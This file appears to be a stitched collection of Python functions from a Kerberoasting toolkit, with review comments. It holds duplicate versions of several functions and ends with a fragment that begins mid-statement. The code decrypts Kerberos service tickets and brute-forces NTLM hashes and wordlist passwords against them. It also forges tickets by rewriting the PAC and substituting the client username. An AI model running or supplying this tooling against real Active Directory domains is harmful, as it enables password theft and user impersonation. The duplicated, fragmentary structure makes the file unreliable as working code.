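def getpac(key, rawticket, debug=False, verbose=False):
	"""Extract the raw PAC blob from a DER-encoded KRB-CRED (.kirbi) ticket.

	Args:
		key: key used to decrypt the ticket's enc-part (whatever
			`kerberos.decrypt` expects, e.g. the service account's key).
		rawticket: DER bytes of the KRB-CRED structure.
		debug: accepted for interface compatibility; not used here.
		verbose: print progress messages to stdout when True.

	Returns:
		The PAC bytes carried in the first AD-IF-RELEVANT entry of the
		ticket's authorization-data.

	Raises:
		ValueError: if the ticket does not parse or `key` does not decrypt it.
	"""
	# Positional walk of the generic (no asn1Spec) decode: presumably
	# KRB-CRED[2] = tickets, tickets[0].enc-part ([3]) .cipher ([2]).
	try:
		ramticket, _ = decoder.decode(rawticket)
		serverticket = ramticket.getComponentByPosition(2)
		encserverticket = (serverticket.getComponentByPosition(0)
			.getComponentByPosition(3)
			.getComponentByPosition(2)
			.asOctets())
	except Exception:
		# Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
		# are not turned into "invalid file".
		raise ValueError('Unable to decode ticket. Invalid file.')
	if verbose:
		print('Ticket succesfully decoded')

	# Second argument is the key-usage number; 2 is presumably the
	# ticket enc-part usage (RFC 4120 7.5.1) -- confirm against kerberos.decrypt.
	decserverticketraw, _ = kerberos.decrypt(key, 2, encserverticket)
	if decserverticketraw is None:
		raise ValueError('Unable to decrypt ticket. Invalid key.')
	if verbose:
		print('Decryption successful')

	decserverticket, _ = decoder.decode(decserverticketraw)

	# Kept from the original: rewrites the validity times at positions
	# [5]..[8] of the decoded EncTicketPart. It does not influence the PAC
	# returned below, but the helper is external and may have side effects,
	# so the call is preserved.
	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))

	# [9] is used as authorization-data here; its first element's ad-data is
	# an AD-IF-RELEVANT wrapper whose first entry's ad-data is the PAC.
	adifrelevant, _ = decoder.decode(decserverticket[9][0][1])
	# asOctets() (as used for the cipher above) returns the raw value on
	# both Python 2 and 3; str() only does on Python 2.
	pac = adifrelevant.getComponentByPosition(0).getComponentByPosition(1).asOctets()
	return pac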
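def crackTicket(ticket, label, hashList):
	"""Try each NTLM hash in `hashList` against one base64-encoded ticket.

	Args:
		ticket: base64 text holding either a DER KRB-CRED blob (first byte
			0x76, i.e. a .kirbi) or newline-separated hex-encoded TGS-REP
			blobs (text starting with "6d").
		label: account name used in the printed/returned status.
		hashList: iterable of hex-encoded NTLM hashes to test.

	Returns:
		"FAIL<label>" (with a trailing newline for a base64 failure, as
		before) when the ticket cannot be parsed, otherwise "". A matching
		hash is reported on stdout, not returned.
	"""
	try:
		data = base64.b64decode(ticket)
	except Exception:
		return "FAIL" + str(label) + "\n"

	# A plain list replaces multiprocessing.Manager().list(): nothing in
	# this function runs in another process, and a Manager forks a server
	# process on every call.
	enctickets = []

	# Byte-slice comparisons behave the same on py2 str and py3 bytes
	# (the original data[0] == '\x76' is never true on Python 3).
	if data[:1] == b'\x76':
		# 0x76 = [APPLICATION 22], presumably KRB-CRED: tickets[0].enc-part.cipher
		try:
			enctickets.append(decoder.decode(data)[0][2][0][3][2].asOctets())
		except Exception:
			return "FAIL" + str(label)
	elif data[:2] == b'6d':
		# Hex text, one TGS-REP (0x6d = [APPLICATION 13]) per line:
		# ticket.enc-part.cipher. unhexlify == str.decode('hex') on py2.
		for line in data.strip().split(b'\n'):
			try:
				enctickets.append(decoder.decode(binascii.unhexlify(line))[0][4][3][2].asOctets())
			except Exception:
				return "FAIL" + str(label)

	if not enctickets:
		# Neither format matched: the original indexed enctickets[0] here
		# and died with IndexError.
		return "FAIL" + str(label)

	print("\nAccount: " + label)

	# As before only the first collected ticket is tested. A truthy result
	# is taken as a key match; this relies on kerberos.decrypt returning
	# None when the MAC check fails -- confirm against its implementation.
	target = enctickets[0]
	for currentHash in hashList:
		kdata, _ = kerberos.decrypt(binascii.unhexlify(currentHash), 2, target)
		if kdata:
			print("NTLM Hash: " + currentHash)
			break

	return ""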
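def crackTicket(ticket, label, hashList):
    """Check a list of hex NTLM hashes against one base64-encoded ticket.

    Args:
        ticket: base64 text; decodes either to a DER KRB-CRED (first byte
            0x76, a .kirbi) or to hex text of newline-separated TGS-REP
            blobs (starting with "6d").
        label: account name for the status line.
        hashList: hex-encoded NTLM hashes to try, in order.

    Returns:
        "FAIL<label>\\n" if the base64 is bad, "FAIL<label>" if no ticket
        could be parsed, "" otherwise. A hit is printed, not returned.
    """
    try:
        data = base64.b64decode(ticket)
    except Exception:
        return "FAIL" + str(label) + "\n"

    # No Manager().list() here: the function is single-process and a
    # Manager starts a helper process per call.
    enctickets = []

    # Slice comparisons work for py2 str and py3 bytes alike; the original
    # data[0] == '\x76' compares an int to a str on Python 3.
    if data[:1] == b'\x76':
        # Presumably KRB-CRED ([APPLICATION 22]): tickets[0].enc-part.cipher
        try:
            enctickets.append(decoder.decode(data)[0][2][0][3][2].asOctets())
        except Exception:
            return "FAIL" + str(label)
    elif data[:2] == b'6d':
        # One hex TGS-REP ([APPLICATION 13]) per line: ticket.enc-part.cipher
        for line in data.strip().split(b'\n'):
            try:
                enctickets.append(
                    decoder.decode(binascii.unhexlify(line))[0][4][3][2].asOctets())
            except Exception:
                return "FAIL" + str(label)

    if not enctickets:
        # Unknown format; the original raised IndexError on enctickets[0].
        return "FAIL" + str(label)

    print("\nAccount: " + label)

    # Only the first ticket is tested (unchanged). `if kdata` assumes
    # kerberos.decrypt returns None on a MAC mismatch -- confirm.
    target = enctickets[0]
    for currentHash in hashList:
        kdata, _ = kerberos.decrypt(binascii.unhexlify(currentHash), 2, target)
        if kdata:
            print("NTLM Hash: " + currentHash)
            break

    return ""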
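def crack(wordlist, enctickets):
    """Worker loop: take candidate passwords from `wordlist` and try each
    against every outstanding ticket.

    Args:
        wordlist: queue-like object with a blocking `get()`; the string
            'ENDOFQUEUEENDOFQUEUEENDOFQUEUE' is the end-of-work sentinel.
        enctickets: list of (cipher, index, filename) tuples, possibly a
            multiprocessing-managed list shared with other workers; cracked
            entries are removed from it.

    Returns:
        None. Hits are printed to stdout.
    """
    while enctickets:
        try:
            word = wordlist.get()
            if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
                break
            # Drop a UTF-8 BOM that may have leaked in from the wordlist file.
            print("\ntrying %s" % word.encode('utf-8').decode(
                'utf-8-sig').strip())
            # Built per word. The original accumulated `toremove` across
            # words, so the word after a hit tried to remove an entry that
            # was already gone, hit the except and returned -- the worker
            # quit with tickets still outstanding.
            cracked = []
            for et in enctickets:
                kdata, _ = kerberos.decrypt(kerberos.ntlmhash(word), 2,
                                            et[0])
                if kdata:
                    print('found password for ticket %i: %s  File: %s' % (
                        et[1], word, et[2]))
                    cracked.append(et)
            for et in cracked:
                try:
                    enctickets.remove(et)
                except ValueError:
                    # Already removed, presumably by another worker.
                    pass
            if not enctickets:
                return
        except Exception:
            # Bad word (encoding error, decrypt failure): skip it. Narrowed
            # from a bare except so Ctrl-C still stops the worker.
            continue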
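def updatepac(key, rawticket, pac, debug=False, verbose=False):
	"""Replace the PAC inside a KRB-CRED ticket and re-encrypt the ticket.

	Only the server signature inside `pac` is recomputed (with `key`); the
	trailing bytes after it -- presumably the KDC signature buffer -- are
	carried over unchanged, so the result is only accepted where that
	signature is not verified.

	Args:
		key: key that decrypts the ticket's enc-part and signs the PAC.
		rawticket: DER bytes of the KRB-CRED structure.
		pac: new PAC bytes; must contain the signature block so the
			fixed-offset rewrite below lands on the server signature.
		debug: accepted for interface compatibility; not used here.
		verbose: print progress messages when True.

	Returns:
		DER bytes of the rebuilt KRB-CRED.

	Raises:
		ValueError: ticket does not parse, key does not decrypt it, `pac`
			is too short, or the computed checksum is not 16 bytes.
	"""
	# Presumably KRB-CRED[2] = tickets, tickets[0].enc-part([3]).cipher([2]).
	try:
		ramticket, _ = decoder.decode(rawticket)
		serverticket = ramticket.getComponentByPosition(2)
		encserverticket = (serverticket.getComponentByPosition(0)
			.getComponentByPosition(3)
			.getComponentByPosition(2)
			.asOctets())
	except Exception:
		# Narrowed from a bare except so Ctrl-C is not reported as a bad file.
		raise ValueError('Unable to decode ticket. Invalid file.')
	if verbose:
		print('Ticket succesfully decoded')

	# Key usage 2 is presumably the ticket enc-part usage (RFC 4120 7.5.1).
	# `nonce` is reused for re-encryption below.
	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
	if decserverticketraw is None:
		raise ValueError('Unable to decrypt ticket. Invalid key.')
	if verbose:
		print('Decryption successful')

	decserverticket, _ = decoder.decode(decserverticketraw)

	# Rewrites the validity times at [5]..[8] of the EncTicketPart in place.
	updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))

	# [9] is used as authorization-data; its first ad-data is AD-IF-RELEVANT.
	adifrelevant, _ = decoder.decode(decserverticket[9][0][1])

	# '\x11\x00\x00\x00' is 17 little-endian -- presumably the PAC
	# signature key usage (KERB_NON_KERB_CKSUM_SALT); confirm against
	# kerberos.chksum.
	chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)

	# The slicing below overwrites exactly the 16 bytes ending 28 bytes
	# before the end of `pac`. Guard the two ways that silently produces a
	# corrupt PAC: a PAC too short to hold that block, or a checksum whose
	# length differs from the 16 bytes being replaced.
	if len(pac) < 44:
		raise ValueError('PAC too short to contain the signature block.')
	if len(chksum) != 16:
		raise ValueError('Unexpected checksum length: %d' % len(chksum))
	# repair server checksum
	newpac = pac[:-44] + chksum + pac[-28:]

	# rebuild AD-IF-RELEVANT and put it back into the ticket
	adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
	decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)

	# Re-encrypt with the nonce/confounder recovered from the original
	# ticket. NOTE(review): whether reusing it is acceptable depends on the
	# cipher behind kerberos.encrypt -- confirm.
	newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket

	return encoder.encode(ramticket)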
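def crack(wordlist, enctickets):
    """Worker loop: try every password from `wordlist` against every
    outstanding ticket, removing tickets as they are cracked.

    NOTE(review): unlike the sibling variants there is no end-of-queue
    sentinel, so `wordlist.get()` blocks forever once the producer is done
    unless the queue is shut down some other way -- confirm with the caller.

    Args:
        wordlist: queue-like object with a blocking `get()`.
        enctickets: list of (cipher, index, filename) tuples, possibly a
            multiprocessing-managed list shared with other workers.

    Returns:
        None. Hits are printed to stdout.
    """
    while enctickets:
        word = wordlist.get()
        # Collected per word. The original kept one `toremove` list for
        # the whole loop, so the word after a hit re-removed the same
        # entry, raised, and returned with tickets still outstanding.
        cracked = []
        for et in enctickets:
            kdata, _ = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
            if kdata:
                print('found password for ticket %i: %s  File: %s' %
                      (et[1], word, et[2]))
                cracked.append(et)
        for et in cracked:
            try:
                enctickets.remove(et)
            except ValueError:
                # Already removed, presumably by another worker.
                pass
        if not enctickets:
            return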
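def crack(wordlist, enctickets):
	"""Worker loop: pull passwords from `wordlist` until the sentinel and
	try each one against every outstanding ticket.

	Args:
		wordlist: queue-like object with a blocking `get()`; the string
			'ENDOFQUEUEENDOFQUEUEENDOFQUEUE' ends the worker.
		enctickets: list of (cipher, index, filename) tuples, possibly a
			multiprocessing-managed list shared with other workers; cracked
			entries are removed from it.

	Returns:
		None. Hits are printed to stdout.
	"""
	while enctickets:
		word = wordlist.get()
		if word == 'ENDOFQUEUEENDOFQUEUEENDOFQUEUE':
			break
		# Per-word hit list. The original reused one `toremove` across
		# words, so the word after a hit tried to remove a gone entry and
		# the worker returned early with tickets still outstanding.
		cracked = []
		for et in enctickets:
			kdata, _ = kerberos.decrypt(kerberos.ntlmhash(word), 2, et[0])
			if kdata:
				print('found password for ticket %i: %s  File: %s' % (et[1], word, et[2]))
				cracked.append(et)
		for et in cracked:
			try:
				enctickets.remove(et)
			except ValueError:
				# Already removed, presumably by another worker.
				pass
		if not enctickets:
			return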
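def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
	"""Rewrite the first cname component inside a KRB-CRED ticket's enc-part.

	Args:
		key: key that decrypts (and re-encrypts) the ticket's enc-part.
		rawticket: DER bytes of the KRB-CRED structure.
		username: new value for the first name-string of the cname.
		debug: accepted for interface compatibility; not used here.
		verbose: print progress messages when True.

	Returns:
		The modified pyasn1 KRB-CRED object (not DER bytes -- unlike
		updatepac, callers must encode it themselves).

	Raises:
		ValueError: if the ticket does not parse or `key` does not decrypt it.
	"""
	# Presumably KRB-CRED[2] = tickets, tickets[0].enc-part([3]).cipher([2]).
	try:
		ramticket, _ = decoder.decode(rawticket)
		serverticket = ramticket.getComponentByPosition(2)
		encserverticket = (serverticket.getComponentByPosition(0)
			.getComponentByPosition(3)
			.getComponentByPosition(2)
			.asOctets())
	except Exception:
		# Narrowed from a bare except so Ctrl-C is not reported as a bad file.
		raise ValueError('Unable to decode ticket. Invalid file.')
	if verbose:
		print('Ticket succesfully decoded')

	decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
	# The original went straight to decoder.decode(None) on a wrong key;
	# fail the same way the sibling functions do.
	if decserverticketraw is None:
		raise ValueError('Unable to decrypt ticket. Invalid key.')
	if verbose:
		print('Decryption successful')

	# EncTicketPart[3] is cname; [1] its name-string; [0] the first component.
	encpart = decoder.decode(decserverticketraw)[0]
	encpart[3][1][0]._value = username

	# Re-encrypt with the nonce recovered from the original ticket.
	newencserverticket = kerberos.encrypt(key, 2, encoder.encode(encpart), nonce)
	ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket

	return ramticket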
                ((decoder.decode(data)[0][2][0][3][2]).asOctets(), i, f))
            i += 1
        elif data[:2] == '6d':
            for ticket in data.strip().split('\n'):
                enctickets.append(((decoder.decode(
                    ticket.decode('hex'))[0][4][3][2]).asOctets(), i, f))
                i += 1

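if len(enctickets):
    print("Cracking %i tickets..." % len(enctickets))
else:
    print("No tickets found")
    sys.exit()

# Load the wordlist: one candidate per line. Each candidate is NTLM-hashed
# once and tried against every ticket still outstanding.
for w in args.wordlistfile:
    word = w.decode('utf-8').strip()
    # `key` rather than `hash`, which shadowed the builtin.
    key = kerberos.ntlmhash(word)
    # Iterate over a snapshot: removing from `enctickets` while iterating
    # it skipped the entry right after every hit.
    for et in list(enctickets):
        kdata, nonce = kerberos.decrypt(key, 2, et[0])
        if kdata:
            print('found password for ticket %i: %s  File: %s' %
                  (et[1], word, et[2]))
            enctickets.remove(et)
            if len(enctickets) == 0:
                print('Successfully cracked all tickets')
                sys.exit()

if len(enctickets):
    print("Unable to crack %i tickets" % len(enctickets))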